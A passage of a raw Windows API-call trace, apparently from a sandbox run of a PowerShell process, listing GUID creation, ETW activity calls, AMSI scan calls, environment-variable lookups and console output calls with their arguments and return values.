[1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86de694*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0168.607] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7657868 [0168.610] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x7658968 [0168.634] CoCreateGuid (in: pguid=0x86de420 | out: pguid=0x86de420*(Data1=0x3be40821, Data2=0x2d9a, Data3=0x4668, Data4=([0]=0x85, [1]=0x3, [2]=0xc7, [3]=0x97, [4]=0x60, [5]=0xd, [6]=0x48, [7]=0x6d))) returned 0x0 [0168.679] QueryPerformanceCounter (in: lpPerformanceCount=0x86de16c | out: lpPerformanceCount=0x86de16c*=26443521504) returned 1 [0168.680] AmsiScanString () returned 0x80070015 [0171.452] CoCreateGuid (in: pguid=0x86de420 | out: pguid=0x86de420*(Data1=0xb396fa4a, Data2=0xe840, Data3=0x47dc, Data4=([0]=0xa1, [1]=0x73, [2]=0x51, [3]=0xce, [4]=0x48, [5]=0x7, [6]=0xc3, [7]=0x3c))) returned 0x0 [0171.493] QueryPerformanceCounter (in: lpPerformanceCount=0x86de16c | out: lpPerformanceCount=0x86de16c*=26724896903) returned 1 [0171.493] AmsiScanString () returned 0x80070015 [0172.635] CoCreateGuid (in: pguid=0x86ddfc4 | out: pguid=0x86ddfc4*(Data1=0xd853f133, Data2=0xe745, Data3=0x4327, Data4=([0]=0xa8, [1]=0x86, [2]=0x39, [3]=0x2, [4]=0xc, [5]=0x51, [6]=0xd, [7]=0x34))) returned 0x0 [0172.636] QueryPerformanceCounter (in: lpPerformanceCount=0x86dde00 | out: lpPerformanceCount=0x86dde00*=26839163882) returned 1 [0172.636] AmsiScanString () returned 0x80070015 [0172.655] QueryPerformanceCounter (in: lpPerformanceCount=0x86dddc8 | out: lpPerformanceCount=0x86dddc8*=26841101717) returned 1 [0172.656] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddf28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddf28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.656] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dde94*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dde94*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x74, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.656] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.656] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dd850, nSize=0xc3 | out: lpBuffer="䤤Տ?࡭") returned 0x0 [0172.732] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddbbc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddbbc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.732] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.732] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.734] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb4c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb4c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.856] QueryPerformanceCounter (in: lpPerformanceCount=0x86dd980 | out: lpPerformanceCount=0x86dd980*=26861205903) returned 1 [0172.856] AmsiScanString () returned 0x80070015 [0172.859] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x82c [0172.860] CoCreateGuid (in: pguid=0x86dd888 | out: pguid=0x86dd888*(Data1=0x1140d33d, Data2=0xf3c1, Data3=0x490a, Data4=([0]=0xbf, [1]=0xe5, [2]=0xb0, [3]=0x2e, [4]=0xa2, [5]=0xe1, [6]=0xaa, [7]=0x3b))) returned 0x0 [0172.860] QueryPerformanceCounter (in: lpPerformanceCount=0x86dd6c4 | out: lpPerformanceCount=0x86dd6c4*=26861546391) returned 1 [0172.860] AmsiScanString () returned 0x80070015 [0172.873] QueryPerformanceCounter (in: lpPerformanceCount=0x86dd68c | out: lpPerformanceCount=0x86dd68c*=26862897778) returned 1 [0172.874] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86dd7ec*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dd7ec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.874] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dd758*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dd758*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x98, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.874] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86dd7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86dd7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0172.874] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dd114, nSize=0xc3 | out: lpBuffer="㩄Ց턼࡭") returned 0x0 [0172.874] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dd410*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dd410*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9a, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0173.392] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dd77c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dd77c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x9a, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0173.392] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86dd7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86dd7dc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0173.392] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddeb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddeb8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x99, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0173.392] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.410] CoCreateGuid (in: pguid=0x86ddfc4 | out: pguid=0x86ddfc4*(Data1=0x19e8d8a7, Data2=0xae37, Data3=0x4522, Data4=([0]=0xbb, [1]=0x55, [2]=0xfc, [3]=0xdb, [4]=0xcf, [5]=0xd7, [6]=0x6, [7]=0x4f))) returned 0x0 [0174.410] QueryPerformanceCounter (in: lpPerformanceCount=0x86dde00 | out: lpPerformanceCount=0x86dde00*=27016590061) returned 1 [0174.410] AmsiScanString () returned 0x80070015 [0174.507] QueryPerformanceCounter (in: lpPerformanceCount=0x86dddc8 | out: lpPerformanceCount=0x86dddc8*=27026308001) returned 1 [0174.507] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddf28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddf28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.508] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dde94*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dde94*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x97, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.508] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.508] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dd850, nSize=0xc3 | out: lpBuffer="븀Օ?࡭") returned 0x0 [0174.508] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddbbc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddbbc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa4, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.508] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.509] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa4, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa4, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.509] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb4c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb4c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa4, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.578] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddeb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddeb8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa4, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0174.578] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.212] CoCreateGuid (in: pguid=0x86ddfc4 | out: pguid=0x86ddfc4*(Data1=0x92cb32fd, Data2=0xeae3, Data3=0x43de, Data4=([0]=0x92, [1]=0xe7, [2]=0xe8, [3]=0xb6, [4]=0xcd, [5]=0xb7, [6]=0x31, [7]=0x21))) returned 0x0 [0175.212] QueryPerformanceCounter (in: lpPerformanceCount=0x86dde00 | out: lpPerformanceCount=0x86dde00*=27096818784) returned 1 [0175.213] AmsiScanString () returned 0x80070015 [0175.216] QueryPerformanceCounter (in: lpPerformanceCount=0x86dddc8 | out: lpPerformanceCount=0x86dddc8*=27097196097) returned 1 [0175.216] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddf28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddf28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.216] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86dde94*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86dde94*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.216] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.217] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x86dd850, nSize=0xc3 | out: lpBuffer="ꦬ՘?࡭") returned 0x0 [0175.217] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x86ddbbc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddbbc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.217] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb28*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb28*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.217] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddbac*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.217] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddb4c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddb4c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.367] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x86ddeb8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x86ddeb8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.367] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x86ddf18*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x4c, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0175.438] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de5ec | out: lpConsoleScreenBufferInfo=0x86de5ec) returned 1 [0175.464] GetConsoleOutputCP () returned 0x1b5 [0175.489] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.490] GetConsoleOutputCP () returned 0x1b5 [0175.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.499] GetConsoleOutputCP () returned 0x1b5 [0175.631] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.632] GetConsoleOutputCP () returned 0x1b5 [0175.711] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.711] GetConsoleOutputCP () returned 0x1b5 [0175.724] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.724] GetConsoleOutputCP () returned 0x1b5 [0175.752] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.752] GetConsoleOutputCP () returned 0x1b5 [0175.764] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x86de464, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x86de464) returned 0 [0175.766] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0175.776] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0175.838] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0175.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0175.920] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0175.992] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0176.080] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0176.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x86ddb68, nSize=0xc3 | out: lpBuffer="?࡭?࡭竔玪柾ꀡ抈琎") returned 0x0 [0176.192] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0176.221] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a3ed8*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a3ed8*, lpNumberOfCharsWritten=0x86de4f4*=0x27) returned 1 [0176.401] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0176.455] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0176.477] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0176.494] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0176.501] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0176.519] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x86de534, lpReserved=0x0 | out: lpBuffer=0x51464f4*, lpNumberOfCharsWritten=0x86de534*=0x1) returned 1 [0176.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de544 | out: lpConsoleScreenBufferInfo=0x86de544) returned 1 [0176.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0176.560] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4dc | out: lpConsoleScreenBufferInfo=0x86de4dc) returned 1 [0176.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0176.586] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x5c) returned 1 [0176.633] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e4 | out: lpConsoleScreenBufferInfo=0x86de4e4) returned 1 [0176.645] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0xc) returned 1 [0176.674] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de500 | out: lpMode=0x86de500) returned 1 [0176.687] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x55a3f34*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x86de4f4, lpReserved=0x0 | out: lpBuffer=0x55a3f34*, lpNumberOfCharsWritten=0x86de4f4*=0x10) returned 1 [0176.717] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0176.761] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x6) returned 1 [0176.788] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0x86de4e0 | out: lpConsoleScreenBufferInfo=0x86de4e0) returned 1 [0176.803] SetConsoleTextAttribute (hConsoleOutput=0x65c, wAttributes=0x56) returned 1 [0176.817] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0x86de540 | out: lpMode=0x86de540) returned 1 [0176.821] WriteConsoleW (in: hConsoleOutput=0x65c, lpBuffer=0x51464f4*, 